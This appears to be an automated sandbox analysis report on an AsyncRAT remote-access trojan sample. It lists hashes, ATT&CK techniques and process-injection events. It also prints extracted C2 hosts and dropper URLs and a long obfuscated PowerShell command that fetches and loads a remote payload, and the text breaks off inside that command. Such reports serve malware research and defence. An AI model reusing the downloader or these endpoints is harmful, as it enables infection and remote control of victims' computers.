asyncrat | 4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f

Analysis

max time kernel
118s
max time network
149s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
14-08-2024 20:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
Size

819KB
MD5

d43179e5cb6353e4de7038bdc47b01ac
SHA1

2af16fcb37dd760d46c43c895e66e08eaf3ce4e7
SHA256

4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f
SHA512

e6fc5976a203dfc4ea7436721f5eb9a580c212f790e4d3acf90f4ae48525535816aa4e764ff9488408d649f7195e0465321bb063297050d88087549d33ad08fe
SSDEEP

12288:DBdlwHRn+WlYV+96qE9SR6rGiIZgUhtUJ++n0UCbMFKb7dnOu84S6Kc90Y7Y:DBkVdlYAQC6rCJhq0UQMFKb7dOu84xZq

Score

10^/10

asyncrat 014agosto agosto 14 discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Extracted

Family

asyncrat

Version

1.0.7

Botnet

014agosto

telorino1581.duckdns.org:5500

Mutex

123ADSFRETFGFDkZXSkijweqsa

Attributes

delay
1
install
false
install_file
qawsedrftyujgh.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Agosto 14

crepoher09.duckdns.org:4050

Mutex

Firewallghdretsydufiognbcngksjplatadsfw

Attributes

delay
15
install
false
install_file
windowsdefender
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	1996	powershell.exe
7	1996	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
652	powershell.exe
1996	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
2816	pdf.exe
2932	WinRaR.exe
2584	WinRaRS.exe

Loads dropped DLL 11 IoCs

pid	Process
2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
2932	WinRaR.exe
2932	WinRaR.exe
2932	WinRaR.exe
2932	WinRaR.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2816 set thread context of 2764	2816	pdf.exe	36
PID 2584 set thread context of 2852	2584	WinRaRS.exe	35

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinRaR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinRaRS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
652	powershell.exe
1996	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	652	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	2852	vbc.exe
Token: SeDebugPrivilege	2764	vbc.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2680 wrote to memory of 2816	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	30
PID 2680 wrote to memory of 2816	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	30
PID 2680 wrote to memory of 2816	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	30
PID 2680 wrote to memory of 2816	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	30
PID 2680 wrote to memory of 2932	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	31
PID 2680 wrote to memory of 2932	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	31
PID 2680 wrote to memory of 2932	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	31
PID 2680 wrote to memory of 2932	2680	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	31
PID 2932 wrote to memory of 2584	2932	WinRaR.exe	32
PID 2932 wrote to memory of 2584	2932	WinRaR.exe	32
PID 2932 wrote to memory of 2584	2932	WinRaR.exe	32
PID 2932 wrote to memory of 2584	2932	WinRaR.exe	32
PID 2932 wrote to memory of 2524	2932	WinRaR.exe	33
PID 2932 wrote to memory of 2524	2932	WinRaR.exe	33
PID 2932 wrote to memory of 2524	2932	WinRaR.exe	33
PID 2932 wrote to memory of 2524	2932	WinRaR.exe	33
PID 2524 wrote to memory of 652	2524	WScript.exe	34
PID 2524 wrote to memory of 652	2524	WScript.exe	34
PID 2524 wrote to memory of 652	2524	WScript.exe	34
PID 2524 wrote to memory of 652	2524	WScript.exe	34
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 2816 wrote to memory of 2764	2816	pdf.exe	36
PID 2584 wrote to memory of 2852	2584	WinRaRS.exe	35
PID 652 wrote to memory of 1996	652	powershell.exe	38
PID 652 wrote to memory of 1996	652	powershell.exe	38
PID 652 wrote to memory of 1996	652	powershell.exe	38
PID 652 wrote to memory of 1996	652	powershell.exe	38

C:\Users\Admin\AppData\Local\Temp\4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
"C:\Users\Admin\AppData\Local\Temp\4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680
- C:\ProgramData\pdf.exe
  "C:\ProgramData\pdf.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- C:\ProgramData\WinRaR.exe
  "C:\ProgramData\WinRaR.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\ProgramData\WinRaRS.exe
    "C:\ProgramData\WinRaRS.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2584
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2852
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinRar.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻VQBy⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻JwBo⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bw⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻Og⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻aQBh⦷ ⠊ ⟙ ᧳ ৻Dg⦷ ⠊ ⟙ ᧳ ৻M⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻z⦷ ⠊ ⟙ ᧳ ৻DE⦷ ⠊ ⟙ ᧳ ৻M⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻dQBz⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻YQBy⦷ ⠊ ⟙ ᧳ ৻GM⦷ ⠊ ⟙ ᧳ ৻a⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻cgBn⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻Mg⦷ ⠊ ⟙ ᧳ ৻3⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻aQB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQBz⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻dgBi⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻Xw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Mg⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Nw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻Xw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Mg⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Nw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻LwB2⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻cw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻c⦷ ⠊ ⟙ ᧳ ৻Bn⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Hc⦷ ⠊ ⟙ ᧳ ৻ZQBi⦷ ⠊ ⟙ ᧳ ৻EM⦷ ⠊ ⟙ ᧳ ৻b⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bgB0⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻E4⦷ ⠊ ⟙ ᧳ ৻ZQB3⦷ ⠊ ⟙ ᧳ ৻C0⦷ ⠊ ⟙ ᧳ ৻TwBi⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻ZQBj⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻BT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻E4⦷ ⠊ ⟙ ᧳ ৻ZQB0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻VwBl⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻QwBs⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻ZQBC⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻B3⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻YgBD⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻aQBl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻EQ⦷ ⠊ ⟙ ᧳ ৻bwB3⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻b⦷ ⠊ ⟙ ᧳ ৻Bv⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BE⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻Cg⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻VQBy⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻KQ⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻aQBt⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻ZwBl⦷ ⠊ ⟙ ᧳ ৻FQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻WwBT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻FQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻LgBF⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻YwBv⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻aQBu⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻XQ⦷ ⠊ ⟙ ᧳ ৻6⦷ ⠊ ⟙ ᧳ ৻Do⦷ ⠊ ⟙ ᧳ ৻VQBU⦷ ⠊ ⟙ ᧳ ৻EY⦷ ⠊ ⟙ ᧳ ৻O⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ec⦷ ⠊ ⟙ ᧳ ৻ZQB0⦷ ⠊ ⟙ ᧳ ৻FM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻By⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bgBn⦷ ⠊ ⟙ ᧳ ৻Cg⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻QgB5⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻ZQBz⦷ ⠊ ⟙ ᧳ ৻Ck⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻P⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻8⦷ ⠊ ⟙ ᧳ ৻EI⦷ ⠊ ⟙ ᧳ ৻QQBT⦷ ⠊ ⟙ ᧳ ৻EU⦷ ⠊ ⟙ ᧳ ৻Ng⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻F8⦷ ⠊ ⟙ ᧳ ৻UwBU⦷ ⠊ ⟙ ᧳ ৻EE⦷ ⠊ ⟙ ᧳ ৻UgBU⦷ ⠊ ⟙ ᧳ ৻D4⦷ ⠊ ⟙ ᧳ ৻Pg⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻P⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻8⦷ ⠊ ⟙ ᧳ ৻EI⦷ ⠊ ⟙ ᧳ ৻QQBT⦷ ⠊ ⟙ ᧳ ৻EU⦷ ⠊ ⟙ ᧳ ৻Ng⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻F8⦷ ⠊ ⟙ ᧳ ৻RQBO⦷ ⠊ ⟙ ᧳ ৻EQ⦷ ⠊ ⟙ ᧳ ৻Pg⦷ ⠊ ⟙ ᧳ ৻+⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻V⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻BP⦷ ⠊ ⟙ ᧳ ৻GY⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻Ck⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻ZQBU⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻E8⦷ ⠊ ⟙ ᧳ ৻Zg⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻RgBs⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻Zw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bz⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻YQBy⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻w⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQBn⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ 